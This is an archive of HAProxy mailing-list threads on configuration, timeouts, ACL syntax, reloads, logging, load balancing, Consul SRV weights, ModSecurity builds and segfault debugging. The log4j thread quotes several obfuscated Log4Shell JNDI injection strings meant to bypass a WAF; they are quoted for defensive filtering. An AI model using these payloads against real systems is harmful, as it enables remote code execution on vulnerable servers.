Re: Question about available fetch-methods for http-request

2021-08-11 Thread Igor Cicimov
Hi Maya,

Maybe try this:

http-request set-header Host context_path.ms.example.com if { path_beg 
/context_path } { hdr(Host) -i example.com }
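If the context path is not fixed, the first path segment can be extracted with the field converter instead of hard-coding it. A minimal sketch, assuming HAProxy 2.0 syntax and the example.com / ms.example.com names from the question:

```
# For /context_path/abc/etc, path,field(2,/) yields "context_path"
# (field 1 is the empty string before the leading slash).
http-request set-header Host %[path,field(2,/)].ms.example.com if { hdr(Host) -i example.com }
```

This also answers the underlying question: path_beg and path_reg are ACL matching methods, not sample fetches, so inside %[...] only fetches and converters (path, field, regsub, ...) are valid.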

From: Maya Lena Ayleen Scheu 
Sent: Wednesday, August 11, 2021 9:58 PM
To: haproxy@formilux.org 
Subject: Question about available fetch-methods for http-request

Hi there,

I have some questions regarding HAProxy configuration (HA-Proxy version 2.0.23) 
that are not made clear by the official documentation. I hope you have some 
ideas on how this could be solved.


What I wish to accomplish:

A frontend application is called via a URL that contains a context path.
HAProxy should set a Host header in the backend section with `http-request 
set-header Host`, where the resulting Host contains the context_path found in 
the URL path. An example should make this clear:

The called URL looks like: `https://example.com/context_path/abc/etc`
From this URL I would need to set the following Host header: 
`context_path.ms.example.com`, while the path remains `/context_path/abc/etc`.

While I find many fetch examples for ACLs, I had to learn that most of them 
don't work in `http-request set-header` or `set-env`. I tried to use `path_beg` 
and `path_reg`, which fail to parse, with an error saying the fetch method is 
unknown.

So something like this doesn’t work:
`http-request set-header Host 
%[path_reg(...)].ms.example.domain.com if 
host_example`

or this:
`http-request set-var(req.url_context) path_beg,lower if host_example`

Question:

I am certain that this should somehow be possible, as I even found solutions 
that set variables or headers from urlp, cookies, etc.
What is the explanation for fetch methods like path_beg not being available in 
this context, and how can I work around it?

Thank you in advance and best regards,
Maya Scheu

[https://c.ap4.content.force.com/servlet/servlet.ImageServer?id=0156F0DRM7G&oid=00D9000absk&lastMod=1526270984000]

Know Your Customer due diligence on demand, powered by intelligent process 
automation

Blogs |  
LinkedIn |  
Twitter

Encompass Corporation UK Ltd | Company No. SC493055 | Address: Level 3, 33 
Bothwell Street, Glasgow, UK, G2 6NL
Encompass Corporation Pty Ltd | ACN 140 556 896 | Address: Level 10, 117 
Clarence Street, Sydney, New South Wales, 2000
This email and any attachments is intended only for the use of the individual 
or entity named above and may contain confidential information
If you are not the intended recipient, any dissemination, distribution or 
copying of this email is prohibited.
If received in error, please notify us immediately by return email and destroy 
the original message.






Re: Blocking log4j CVE with HAProxy

2021-12-13 Thread Igor Cicimov
You should also take into account paths that can carry a base64-encoded payload.

To me the best bet for protection via HAProxy is using the SPOA mod_security 
WAF, given people have already come up with comprehensive protection rules.
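For completeness, a naive first-line rule is sketched below: it denies requests whose decoded URL or User-Agent contains "jndi". This is a stopgap sketch, not real protection — the obfuscated payloads quoted further down bypass it entirely, which is exactly why a full WAF is the better bet:

```
# Naive Log4Shell stopgap (sketch only -- trivially bypassed):
# deny when "jndi" appears, case-insensitively, after URL-decoding.
http-request deny deny_status 403 if { url,url_dec,lower -m sub jndi }
http-request deny deny_status 403 if { hdr(user-agent),url_dec,lower -m sub jndi }
```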

Get Outlook for Android


From: Nicolas CARPi 
Sent: Tuesday, 14 December 2021, 10:27
To: Jonathan Matthews
Cc: Olivier D; HAProxy
Subject: Re: Blocking log4j CVE with HAProxy

On 13 Dec, Jonathan Matthews wrote:
> I believe there are string casing operators available, leading to
> options like "${j{$lower:N}di:ldap://...".

Indeed. Maybe this can help, it's the "Bypass WAF" part of the POC[0]:

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxx.xx/poc}

So if one can manage to match all of that, it could work.

Of course this block in the POC is immediately followed by:
Don't trust the web application firewall. ;)

[0]
https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce#bypass-waf

Best,
~Nico









Re: Server timeouts since HAProxy 2.2

2022-08-03 Thread Igor Cicimov
Because of keep-alive?
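If keep-alive (or the server-connection reuse that 2.x performs much more aggressively than 1.8) is the suspect, one way to test is to disable server-side reuse. A sketch, with the backend name assumed from the log below:

```
backend bk_http
    # Close the server-side connection after each response:
    option http-server-close
    # Alternatively, keep client keep-alive but never share
    # server connections between requests:
    # http-reuse never
```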


From: William Edwards 
Sent: Thursday, 4 August 2022, 00:26
To: haproxy@formilux.org 
Subject: Server timeouts since HAProxy 2.2


Hi,

Two days ago, I upgraded my first production system from HAProxy 1.8.19
to 2.2.9. Since then, many HTTP requests are hitting the server timeout.

Before upgrade:

 root@lb0-0:~# zgrep 'sD--' /var/log/haproxy.log.5.gz | wc -l
 0
 root@lb0-0:~# zgrep 'sD--' /var/log/haproxy.log.4.gz | wc -l
 0
 root@lb0-0:~# zgrep 'sD--' /var/log/haproxy.log.3.gz | wc -l
 0

After upgrade:

 # Day of upgrade
 root@lb0-0:~# zgrep 'sD--' /var/log/haproxy.log.2.gz | wc -l
 3798
 # Yesterday
 root@lb0-0:~# grep 'sD--' /var/log/haproxy.log.1 | wc -l
 127176
 # Today, so far
 root@lb0-0:~# grep 'sD--' /var/log/haproxy.log | wc -l
 85063

For this specific request, Ta ("total active time for the HTTP request")
is 3, and Tt ("total TCP session duration time, between the moment the
proxy accepted it and the moment both ends were closed") is 34 (5
minutes, the server timeout):

 Aug  3 00:31:05 lb0-0 haproxy[16884]: $ip:62223
[03/Aug/2022:00:26:05.337] fr_other~
bk_http.lyr_http-lyr02.cf.ha.cyberfusion.cloud/http-lyr02.cf.ha.cyberfusion.cloud
0/0/0/3/34 200 27992 - - sD-- 616/602/226/226/0 0/0 "GET
https://$domain/wp-content/uploads/2022/07/20220712_155022-300x300.jpg
HTTP/2.0"

The backend server indeed served the request within Ta:

 $domain $ip - - [03/Aug/2022:00:26:05 +0200] "GET
/wp-content/uploads/2022/07/20220712_155022-300x300.jpg HTTP/1.1" 200
28008 "https://$domain/stoffen/" "Mozilla/5.0 (Windows NT 10.0; Win64;
x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0
Safari/537.36"

The timeouts only occur with 5 out of 13 backends. There is no clear
pattern, i.e. the timeouts don't come in bursts, and they aren't caused
by fixed clients.

Does anyone know why the TCP session is kept open, and why HAProxy does not
respond to the HTTP request once the backend server has responded, but only
after the server timeout is reached?

--
With kind regards,

William Edwards










Re: ACL with multi or

2023-07-29 Thread Igor Cicimov
http-request tarpit deny_status 403 unless XMail_Autodiscover || XMail_EAS || 
XMail_ECP || XMail_EWS || XMail_MAPI || XMail_OAB || XMail_OWA || XMail_RPC || 
XMail_PowerShell
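HAProxy conditions don't support parentheses, hence the "no such ACL : '('" error. Besides the `unless` / De Morgan rewrite above, the OR group can be folded into a single named ACL, since repeating an `acl` name ORs its patterns. A sketch with hypothetical path matches — substitute whatever fetches the real XMail_* ACLs use:

```
# Declaring the same acl name several times ORs the patterns together.
acl xmail_any path_beg -i /autodiscover
acl xmail_any path_beg -i /owa
acl xmail_any path_beg -i /ews
# A single negation then covers the whole group, no parentheses needed:
http-request tarpit deny_status 403 if !xmail_any
```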

Get Outlook for Android




From: Henning Svane 
Sent: Sunday, July 30, 2023 9:07:29 AM
To: haproxy@formilux.org 
Subject: ACL with multi or


Hi



If everything in the brackets is false, then execute “http-request tarpit 
deny_status 403”; but the following is not accepted.



http-request tarpit deny_status 403 if !(XMail_Autodiscover || XMail_EAS || 
XMail_ECP || XMail_EWS || XMail_MAPI || XMail_OAB || XMail_OWA || XMail_RPC || 
XMail_PowerShell)



Error is

[ALERT](1564) : config : parsing [/etc/haproxy/haproxy.cfg:108] : error 
detected while parsing an 'http-request tarpit' condition : no such ACL : '('.





Is there a way to make it work?



Regards

Henning











Re: maxconn limit not working after reload / sighup

2023-09-20 Thread Igor Cicimov
Hi,

I think this explains it in detail: 
https://www.haproxy.com/blog/should-you-reload-or-restart-haproxy
Particularly this part:

Reloading starts a new HAProxy instance (or “process”) which handles new 
requests, while the old instance maintains connections until they naturally 
close or the hard-stop-after directive takes effect. This avoids severing any 
active connections and prevents any notable service disruption.

Hence anything kept in the memory of the old process, like stats and counters, 
is lost, since a new process gets started.
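If state across reloads matters, HAProxy's server-state mechanism can be tried. A sketch (socket and file paths are assumptions); note that it restores operational state such as weights, addresses and check status, and it is not certain that it covers the live connection counts the question below is about:

```
global
    stats socket /run/haproxy.sock mode 600 level admin
    server-state-file /var/lib/haproxy/server-state

defaults
    load-server-state-from-file global

# Just before each reload, dump the state the new process will load:
#   echo "show servers state" | socat stdio /run/haproxy.sock \
#       > /var/lib/haproxy/server-state
```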


Sent from Outlook for Android




From: Björn Jacke 
Sent: Thursday, September 21, 2023 9:20:03 AM
To: haproxy@formilux.org 
Subject: maxconn limit not working after reload / sighup

Hello,

I just experienced that maxconn can easily fail to work as expected and lead
to unavailable services. Take this example backend configuration of a
2.8.3 haproxy setup:

backend bk_example
   balance first
   server server1   192.168.4.1:8000  id 1  maxconn 10
   server server2   192.168.4.2:8000  id 2  maxconn 10
   server server3   192.168.4.3:8000  id 3  maxconn 10
   ...

Each server here is only able to handle 10 requests; if it receives more,
it will just return an error. Usually the above configuration works fine:
server1 receives up to 10 connections, after which connections are sent to
server2; if that has also reached its maxconn limit, server3 receives
requests, and so on.

So far so good. If haproxy however receives a SIGHUP because of some
reconfiguration, then all the connections to the backend servers are
kept alive but haproxy thinks that the servers have 0 connections and it
will send up to 10 new connections to backend servers, even if they
already had 10 connections, which are still active and still correctly
processed by haproxy. So each server receives up to 20 connections and
the backend servers just return errors in this case.

This is very unexpected, and it actually looks like unintended behavior.
I have also never heard about this, nor read a warning about such a side
effect of a HAProxy reload. Maybe a server-state-file configuration might
work around this problem, but it was not obvious until now that this is a
requirement if maxconn is being used. Can someone shed some light on this?

Thank you
Björn








Log lines in 2.0

2020-02-26 Thread Igor Cicimov
Hi,

I have an HTTP frontend running on a specific PORT for the purpose of
external health checks, so the typical:

mode http
option httplog

I noticed, though, that the log lines for haproxy v2.0.13, which I installed
from the usual Ubuntu PPA from Vincent:

# haproxy -v
HA-Proxy version 2.0.13-1ppa1~bionic 2020/02/15 - https://haproxy.org/

are different from what I'm used to seeing in, let's say, v1.8; it looks like
some extra lines for the headers are being logged?

Feb 27 03:37:21 ip-10-0-4-33 haproxy[21361]:
0d56:monitor-in.accept(0009)=0012 from [IP:56142] ALPN=
Feb 27 03:37:21 ip-10-0-4-33 haproxy[21361]:
0d56:monitor-in.clireq[0012:]: GET /monitor-url HTTP/1.1
Feb 27 03:37:21 ip-10-0-4-33 haproxy[21361]:
0d56:monitor-in.clihdr[0012:]: host: 10.0.4.33:PORT
Feb 27 03:37:21 ip-10-0-4-33 haproxy[21361]:
0d56:monitor-in.clihdr[0012:]: user-agent: ELB-HealthChecker/1.0
Feb 27 03:37:21 ip-10-0-4-33 haproxy[21361]:
0d56:monitor-in.clihdr[0012:]: accept: */*
Feb 27 03:37:21 ip-10-0-4-33 haproxy[21361]:
0d56:monitor-in.clicls[0012:]
Feb 27 03:37:21 ip-10-0-4-33 haproxy[21361]:
0d56:monitor-in.closed[0012:]

I don't have any log-format settings, thus the defaults should be in play,
so I wonder if this is what I should see?

Thanks,
Igor


Re: Log lines in 2.0

2020-02-27 Thread Igor Cicimov
Hi Tim,

On Thu, Feb 27, 2020, 10:09 PM Tim Düsterhus  wrote:

> Igor,
>
> Am 27.02.20 um 05:27 schrieb Igor Cicimov:
> > Feb 27 03:37:21 ip-10-0-4-33 haproxy[21361]:
> > 0d56:monitor-in.accept(0009)=0012 from [IP:56142] ALPN=
> > Feb 27 03:37:21 ip-10-0-4-33 haproxy[21361]:
> > 0d56:monitor-in.clireq[0012:]: GET /monitor-url HTTP/1.1
> > Feb 27 03:37:21 ip-10-0-4-33 haproxy[21361]:
> > 0d56:monitor-in.clihdr[0012:]: host: 10.0.4.33:PORT
> > Feb 27 03:37:21 ip-10-0-4-33 haproxy[21361]:
> > 0d56:monitor-in.clihdr[0012:]: user-agent:
> ELB-HealthChecker/1.0
> > Feb 27 03:37:21 ip-10-0-4-33 haproxy[21361]:
> > 0d56:monitor-in.clihdr[0012:]: accept: */*
> > Feb 27 03:37:21 ip-10-0-4-33 haproxy[21361]:
> > 0d56:monitor-in.clicls[0012:]
> > Feb 27 03:37:21 ip-10-0-4-33 haproxy[21361]:
> > 0d56:monitor-in.closed[0012:]
> >
> > I don't have any log-format settings thus the default ones should be in
> > play so wonder if this is what I should see?
>
> This looks like you are running HAProxy in debug mode. Debug mode is
> enabled via the '-d' command line switch or 'debug' configuration option
> (http://cbonte.github.io/haproxy-dconv/2.1/configuration.html#debug).
>
> Best regards
> Tim Düsterhus
>

Yes, I have the debug option on, thanks. The thing is, it is there in 1.8 too,
but I don't see the same effect.

Cheers,
Igor

>


Re: Log lines in 2.0

2020-02-27 Thread Igor Cicimov
Hi Willy,

On Fri, Feb 28, 2020, 2:15 AM Willy Tarreau  wrote:

> Hi Igor,
>
> On Thu, Feb 27, 2020 at 10:36:44PM +1100, Igor Cicimov wrote:
> > > This looks like you are running HAProxy in debug mode. Debug mode is
> > > enabled via the '-d' command line switch or 'debug' configuration
> option
> > > (http://cbonte.github.io/haproxy-dconv/2.1/configuration.html#debug).
> > >
> > > Best regards
> > > Tim Düsterhus
> > >
> >
> > Yes I have debug option on, thanks. The thing is it is there in 1.8 too
> but
> > I don't see the same effect.
>
> I recently marked the debug option deprecated because it has caused a lot
> of trouble over time (services staying in foreground, spamming logs,
> filling
> file-systems with boot log files etc), and indicated that only "-d" should
> be used explicitly when you want to use the debug mode.
>
> Do you have a *real* use case of "debug" in the global section that is
> not easily solved with "-d" ? I'm asking because I'd really like to see
> this design mistake disappear, but am not (too much) stubborn.
>
> Thanks,
> Willy
>

Not a problem at all, it is just something carried over from our default
test setup, which has its roots in v1.5. I'll remove it and use "-d" from
now on as intended.

Thanks,
Igor

>


Multiple balance statements in a backend

2020-04-02 Thread Igor Cicimov
Hi all,

Probably another quite basic question that I can't find an example of in
the docs (not even as a warning not to do it because it makes no sense or is
bad practice) or on the net. It is regarding the use of multiple balance
statements in a backend, like this:

balance leastconn
balance hdr(Authorization)

So basically, is this a valid use case where we can expect both options to
be considered when load balancing, or is one ignored as a duplicate (and in
that case, which one)?

And in general, how are duplicate statements handled in the code, i.e. is
the first one or the last one considered valid? And are there maybe any
special statements that are exempt from the rule (like, hopefully,
balance :-))?

Thanks in advance.

Igor


Re: Multiple balance statements in a backend

2020-04-03 Thread Igor Cicimov
Hi Baptiste,

On Fri, Apr 3, 2020 at 5:28 PM Baptiste  wrote:

>
>
> On Fri, Apr 3, 2020 at 5:21 AM Igor Cicimov <
> ig...@encompasscorporation.com> wrote:
>
>> Hi all,
>>
>> Probably another quite basic question that I can't find an example of in
>> the docs (at least as a warning not to do that as it does not make sense or
>> bad practise) or on the net. It is regarding the usage of multiple balance
>> statements in a backend like this:
>>
>> balance leastconn
>> balance hdr(Authorization)
>>
>> So basically is this a valid use case where we can expect both options to
>> get considered when load balancing or one is ignored as a duplicate (in
>> which case which one)?
>>
>> And in general how are duplicate statements being handled in the code,
>> .i.e. the first one or the last one is considered as valid, and are there
>> maybe any special statements that are exempt from the rule (like hopefully
>> balance :-) )
>>
>> Thanks in advance.
>>
>> Igor
>>
>>
>
> Hi Igor,
>
> duplicate statement processing depends on the keyword: very few are
> cumulative, and most of them use "last found match".
>
> To come back to the original point, you already have a chance of having 2 LB
> algorithms: if you do 'balance hdr(Authorization)' and no Authorization
> header can be found, then HAProxy falls back to a round robin mode.
> Now, if you need persistence, I think you can enable "balance leastconn"
> and then use a stick table to route known Authorization headers to the
> right server.
> More information here:
>
> https://www.haproxy.com/fr/blog/load-balancing-affinity-persistence-sticky-sessions-what-you-need-to-know/
>
> Baptiste
>

Thanks for confirming this, great stuff!

Cheers,
Igor
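Baptiste's leastconn-plus-stick-table suggestion, sketched as a config fragment (backend name, server addresses and table sizing are assumptions):

```
backend bk_app
    balance leastconn
    # Remember which server handled each Authorization value and
    # route repeat occurrences of it to the same server:
    stick-table type string len 128 size 100k expire 30m
    stick on hdr(Authorization)
    server app1 10.0.0.11:8080 check
    server app2 10.0.0.12:8080 check
```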


Re: Multiple balance statements in a backend

2020-04-03 Thread Igor Cicimov
On Fri, Apr 3, 2020 at 11:23 PM Willy Tarreau  wrote:

> On Fri, Apr 03, 2020 at 09:38:58PM +1100, Igor Cicimov wrote:
> > >> And in general how are duplicate statements being handled in the code,
> > >> .i.e. the first one or the last one is considered as valid, and are
> there
> > >> maybe any special statements that are exempt from the rule (like
> hopefully
> > >> balance :-) )
>
> And just to clarify this point, with balance like most exclusive
> directives, the last one overrides the previous ones. There's a
> reason for this that's easy to remember: the values are first
> pre-initialized from the defaults section's values, so each keyword
> needs to be able to override any previous occurrence.
>
> Willy
>

Got it, thanks Willy.

Igor


Server weight in server-template and consul dns

2020-04-20 Thread Igor Cicimov
Hi,

I have the following template in a server backend:

server-template tomcats 10 _tomcat._tcp.service.consul resolvers consul
resolve-prefer ipv4 check

This is the SRV records resolution:

# dig +short @127.0.0.1 -p 8600 _tomcat._tcp.service.consul SRV
1 10 8080 ip-10-20-3-21.node.dc1.consul.
1 10 8080 ip-10-20-4-244.node.dc1.consul.

The server's weight reported by haproxy is 1, where I expected to see 10.
Just to clarify, is this expected, or is there a mix-up between priority and
weight?

Thanks,
Igor


Re: doubt how to compile modsecurity module for HAproxy

2020-04-26 Thread Igor Cicimov
Hi Ricardo,

On Sun, Apr 26, 2020 at 11:36 AM Ricardo Barbosa 
wrote:

> Hello everyone, everything good? I'm studying how to enable the
> modsecurity module, but I don't know how the compilation process is done.
>
> I found this link
> https://github.com/haproxy/haproxy/tree/master/contrib/modsecurity, but I
> didn't understand how to do it. I downloaded the source code of haproxy, and
> in the file called INSTALL the instructions are to run the make command,
> followed by the "TARGET" parameter, using one of the following options:
>
> linux-glibc, linux-glibc-legacy, solaris, freebsd, openbsd, netbsd,
> cygwin, haiku, aix51, aix52, aix72-gcc, osx, generic, custom.
>
> for example:
>
> make TARGET=linux-glibc
>
> however, there is no configure script to execute so as to follow the
> instructions on the website above. Does anyone have any idea how to do this?
>
> Best Regards
>
>
This is what I have come up with:
https://gist.github.com/icicimov/69456f82e60ea6c53feb341f021fd089

Hope it can help.

Cheers,
Igor


Re: Server weight in server-template and consul dns

2020-04-26 Thread Igor Cicimov
Hi,

On Mon, Apr 20, 2020 at 10:25 PM Igor Cicimov <
ig...@encompasscorporation.com> wrote:

> Hi,
>
> I have the following template in a server backend:
>
> server-template tomcats 10 _tomcat._tcp.service.consul resolvers consul
> resolve-prefer ipv4 check
>
> This is the SRV records resolution:
>
> # dig +short @127.0.0.1 -p 8600 _tomcat._tcp.service.consul SRV
> 1 10 8080 ip-10-20-3-21.node.dc1.consul.
> 1 10 8080 ip-10-20-4-244.node.dc1.consul.
>
> The server's weight reported by haproxy is 1 where I expected to see 10.
> Just to clarify, is this expected or there is a mixup between priority and
> weight?
>
> Thanks,
> Igor
>
>
Giving this another try. Maybe Baptiste can help clarify which part of
the SRV record is considered the server weight: the record priority or the
record weight?

Thanks,
Igor


Re: Server weight in server-template and consul dns

2020-04-27 Thread Igor Cicimov
On Mon, Apr 27, 2020 at 10:14 PM Baptiste  wrote:

>
>
> On Mon, Apr 27, 2020 at 3:05 AM Igor Cicimov <
> ig...@encompasscorporation.com> wrote:
>
>> Hi,
>>
>> On Mon, Apr 20, 2020 at 10:25 PM Igor Cicimov <
>> ig...@encompasscorporation.com> wrote:
>>
>>> Hi,
>>>
>>> I have the following template in a server backend:
>>>
>>> server-template tomcats 10 _tomcat._tcp.service.consul resolvers consul
>>> resolve-prefer ipv4 check
>>>
>>> This is the SRV records resolution:
>>>
>>> # dig +short @127.0.0.1 -p 8600 _tomcat._tcp.service.consul SRV
>>> 1 10 8080 ip-10-20-3-21.node.dc1.consul.
>>> 1 10 8080 ip-10-20-4-244.node.dc1.consul.
>>>
>>> The server's weight reported by haproxy is 1 where I expected to see 10.
>>> Just to clarify, is this expected or there is a mixup between priority and
>>> weight?
>>>
>>> Thanks,
>>> Igor
>>>
>>>
>> Giving this another try. Maybe Baptiste can help to clarify which part of
>> the SRV record is considered as server weight, the record priority or the
>> record weight?
>>
>> Thanks,
>> Igor
>>
>>
>>
> Hi,
>
> This is the record weight.
> There is a trick for weights: the DNS weight range is from 0 to 65535, while
> the HAProxy weight is from 0 to 256. So basically, your DNS weight is divided
> by 256 before being applied,
> so adjust your DNS weight accordingly.
>
> Baptiste
>

Thanks Baptiste, works as per your comment!

Cheers,
Igor
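Concretely, to end up with an HAProxy weight of 10, the Consul service would need to register an SRV weight of 2560 (10 × 256). A sketch of a service definition using Consul's service weights (the field names come from Consul's weights feature; the values are assumptions):

```
{
  "service": {
    "name": "tomcat",
    "port": 8080,
    "weights": {
      "passing": 2560,
      "warning": 1
    }
  }
}
```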


Re: doubt how to compile modsecurity module for HAproxy

2020-04-30 Thread Igor Cicimov
Hi Ricardo,

On Fri, May 1, 2020 at 1:06 PM Ricardo Barbosa 
wrote:

> Of course, it would be a pleasure, but I still couldn't get it to work.
> Following Igor's script I even managed to build it, but it is generating
> the following log.
>
> --- begin -
> 1588299971.657027 [07] 0 clients connected
> 1588299971.657000 [09] 0 clients connected
> 1588299974.851659 [00] <1> New Client connection accepted and assigned to
> worker 01
> 1588299974.851698 [01] <1> read_frame_cb
> 1588299974.851765 [01] <1> New Frame of 129 bytes received
> 1588299974.851774 [01] <1> Decode HAProxy HELLO frame
> 1588299974.851777 [01] <1> Supported versions : 2.0
> 1588299974.851779 [01] <1> HAProxy maximum frame size : 16380
> 1588299974.851780 [01] <1> HAProxy capabilities : pipelining,async
> 1588299974.851789 [01] <1> HAProxy supports frame pipelining
> 1588299974.851797 [01] <1> HAProxy supports asynchronous frame
> 1588299974.851800 [01] <1> HAProxy engine id :
> a9dd7313-bb7e-46e2-a50e-5987dfa4f0d2
> 1588299974.851803 [01] <1> Encode Agent HELLO frame
> 1588299974.851810 [01] <1> Agent version : 2.0
> 1588299974.851813 [01] <1> Agent maximum frame size : 16380
> 1588299974.851816 [01] <1> Agent capabilities :
> 1588299974.851830 [01] <1> write_frame_cb
> 1588299974.851856 [01] <1> Frame of 54 bytes send
> 1588299974.851905 [01] <1> read_frame_cb
> 1588299974.851916 [01] <1> New Frame of 617 bytes received
> 1588299974.851925 [01] <1> Decode HAProxy NOTIFY frame
> 1588299974.851927 [01] <1> STREAM-ID=12 - FRAME-ID=1 - unfragmented frame
> received - frag_len=0 - len=617 - offset=7
> 1588299974.851938 [01] Process frame messages : STREAM-ID=12 - FRAME-ID=1
> - length=610 bytes
> 1588299974.851946 [01] Process SPOE Message 'check-request'
> 1588299974.852077 [01] Encode Agent ACK frame
> 1588299974.852088 [01] STREAM-ID=12 - FRAME-ID=1
> 1588299974.852090 [01] Add action : set variable code=4294967195
> 1588299974.852098 [01] <1> write_frame_cb
> 1588299974.852125 [01] <1> Frame of 30 bytes send
> 1588299976.656052 [01] 1 clients connected
> 1588299976.657844 [04] 0 clients connected
> 1588299976.657858 [02] 0 clients connected
>
> --158831.660228 [08] 0 clients connected
> 158831.660241 [09] 0 clients connected
> 158831.660250 [01] 1 clients connected
> 158834.852590 [01] <1> read_frame_cb
> 158834.852619 [01] <1> New Frame of 49 bytes received
> 158834.852632 [01] <1> Decode HAProxy DISCONNECT frame
> 158834.852640 [01] <1> Disconnect status code : 2
> 158834.852647 [01] <1> Disconnect message : a timeout occurred
> 158834.852653 [01] <1> Peer closed connection: a timeout occurred
> 158834.852660 [01] <1> Encode Agent DISCONNECT frame
> 158834.852666 [01] <1> Disconnect status code : 2
> 158834.852671 [01] <1> Disconnect message : a timeout occurred
> 158834.852685 [01] <1> write_frame_cb
> 158834.852694 [01] Failed to write frame length : Broken pipe
> 158834.852704 [01] <1> Release client
> 158836.655592 [08] 0 clients connected
> 158836.655676 [09] 0 clients connected
> 158836.655608 [03] 0 clients connected
> 158836.655685 [01] 0 clients connected
> ---
>
> Any idea?
>
> when I compile with the new version it shows me the following message:
>
>
> config.status: executing depfiles commands
> config.status: executing libtool commands
> configure: WARNING: unrecognized options: --disable-apache2-module,
> --enable-standalone-module, --enable-pcre-study, --enable-pcre-jit,
> --with-apxs
>
>
> my config:
>
> -- haproxy.cfg
> global
> maxconn 5
> user haproxy
>
> defaults
>
> timeout connect 10s
> timeout client 30s
> timeout server 30s
> mode http
> maxconn 3000
>
> frontend my-front
> bind 0.0.0.0:80
> mode http
> filter spoe engine modsecurity config /opt/haproxy/spoe-modsecurity.conf
> http-request deny if { var(txn.modsec.code) -m int gt 0 }
> default_backend webservers
>
>
> backend spoe-modsecurity
> mode tcp
> server modsec-spoa1 192.168.10.120:12345
>
> backend webservers
> mode http
> balance roundrobin
> server web1 192.168.10.81:80 check
>
> --
>
> - spoe-modsecurity.conf --
>
> [modsecurity]
> spoe-agent modsecurity-agent
> messages check-request
> option var-prefix modsec
> timeout hello 100ms
> timeout idle 30s
> timeout processing 15ms
> use-backend spoe-modsecurity
> spoe-message check-request
> args unique-id method path query req.ver req.hdrs_bin req.body_size
> req.body
> event on-frontend-http-request
>
> -
>
> modsecurity.conf--
> SecStatusEngine On
> SecRuleEngine On
> SecRequestBodyAccess On
> SecRule REQUEST_HEADERS:Content-Type
> "(?:application(?:/soap\+|/)|text/)xml" \
>
> "id:'20',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=XML"
> SecRule REQUEST_HEADERS:Content-Type "application/json" \
>
> "id:'21',phase:1,t:none,t:lowercase,

Haproxy 1.8.25 segfault

2020-05-23 Thread Igor Cicimov
Hi guys,

We are getting segfaults with haproxy 1.8.25 and thought I would ask if
this rings any bell:

segfault at 5609a853 ip 7f1b93928c10 sp 7ffd5e731fd8 error 4 in
libc-2.19.so[7f1b9388e000+1be000]

It is running on Ubuntu 14.04.2 (kernel 4.4.0-144-generic), and it is
happening only on this particular server out of the many dozens we have on
Ubuntu 14.04 and 16.04.

I have attached strace to it, so I should have more details upon the next
crash.

Thanks,
Igor


Re: Haproxy 1.8.25 segfault

2020-05-26 Thread Igor Cicimov
Hi Willy,

On Tue, May 26, 2020 at 4:31 PM Willy Tarreau  wrote:

> Hi Igor,
>
> On Sun, May 24, 2020 at 10:35:10AM +1000, Igor Cicimov wrote:
> > Hi guys,
> >
> > We are getting segfaults with haproxy 1.8.25 and thought I would ask if
> > this rings any bell:
> >
> > segfault at 5609a853 ip 7f1b93928c10 sp 7ffd5e731fd8 error 4
> in
> > libc-2.19.so[7f1b9388e000+1be000]
>
> At this point, no unfortunately. This could be a memcpy() on a NULL
> pointer or a use after free for example.
>
> > It is running on Ubuntu-14.04.2 (kernel 4.4.0-144-generic) and is
> happening
> > only on this particular one out of many dozens we have on Ubuntu-14.04
> and
> > 16.04
> >
> > I have attached strace so more details upon the next crash.
>
> I doubt you'll see much more using strace. You'd rather attach gdb to
> it and let it run. This way when it crashes again you can issue "bt full"
> and see the whole trace.
>
>
Done. Hopefully I get something useful on the next segfault.

> It is even possible to force a core to be dumped from gdb for later
> inspection using "generate-core-file". Some people also know how to script
> it so that it automatically dumps and detaches upon crash, and limits the
> service interruption time, but I never remember how to do this, and the
> help embedded in it is next to inexistent :-/
>

Nice, good to know, thanks; I will dig around for details.

>
> Regards,
> Willy
>

Cheers,
Igor


Re: Haproxy 1.8.25 segfault

2020-05-26 Thread Igor Cicimov
Hi Willy,

On Tue, May 26, 2020 at 4:43 PM Willy Tarreau  wrote:

> On Sun, May 24, 2020 at 10:35:10AM +1000, Igor Cicimov wrote:
> > We are getting segfaults with haproxy 1.8.25
>
> By the way, does this mean you didn't get them with a previous version
> (presumably 1.8.24) ? There aren't that many fixes between 1.8.24 and
> 1.8.25, only 23.
>

Yes, it started happening recently for some reason, definitely on 1.8.25 only:

# zgrep -i segfault /var/log/syslog.*.gz
/var/log/syslog.4.gz:May 23 00:36:52 ip-172-31-37-74 kernel:
[30284682.620567] haproxy[14736]: segfault at 5609a853 ip
7f1b93928c10 sp 7ffd5e731fd8 error 4 in libc-2.19.so
[7f1b9388e000+1be000]
/var/log/syslog.5.gz:May 22 01:18:55 ip-172-31-37-74 kernel:
[30200805.498707] haproxy[7361]: segfault at 5575725c8fff ip
7f7d35bd4c10 sp 7b58a078 error 4 in libc-2.19.so
[7f7d35b3a000+1be000]
/var/log/syslog.5.gz:May 22 12:15:55 ip-172-31-37-74 kernel:
[30240225.673643] haproxy[15054]: segfault at 555f41a03fff ip
7f594d00fc10 sp 7ffeac111c98 error 4 in libc-2.19.so
[7f594cf75000+1be000]
/var/log/syslog.6.gz:May 21 12:08:13 ip-172-31-37-74 kernel:
[30153363.801627] haproxy[28398]: segfault at 55b4b43ccfff ip
7f5f33b53c10 sp 7ffe7fc290e8 error 4 in libc-2.19.so
[7f5f33ab9000+1be000]
/var/log/syslog.7.gz:May 20 16:04:54 ip-172-31-37-74 kernel:
[30081165.011057] haproxy[4830]: segfault at 563a387fafff ip
7fa11e6f2c10 sp 7fffaacd82c8 error 4 in libc-2.19.so
[7fa11e658000+1be000]
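
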